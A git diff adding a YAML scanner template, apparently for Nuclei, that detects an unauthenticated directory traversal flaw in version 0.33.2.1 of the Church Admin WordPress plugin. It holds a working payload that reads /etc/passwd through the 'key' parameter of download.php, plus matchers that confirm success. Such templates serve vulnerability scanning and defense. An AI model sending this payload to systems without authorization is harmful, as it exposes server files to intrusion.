diff --git a/vulnerabilities/wordpress/church-admin-lfi.yaml b/vulnerabilities/wordpress/church-admin-lfi.yaml new file mode 100644 index 0000000000..9885353c52 --- /dev/null +++ b/vulnerabilities/wordpress/church-admin-lfi.yaml @@ -0,0 +1,27 @@ +id: church-admin-lfi + +info: + name: Church Admin 0.33.2.1 - Unauthenticated Directory Traversal + author: 0x_Akoko + severity: high + description: The "key" parameter of download.php from plugins/church-admin/display/download.php is not sanitized and is vulnerable to a directory traversal type of attack. + reference: + - https://wpscan.com/vulnerability/8997 + - https://id.wordpress.org/plugins/church-admin/ + tags: wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200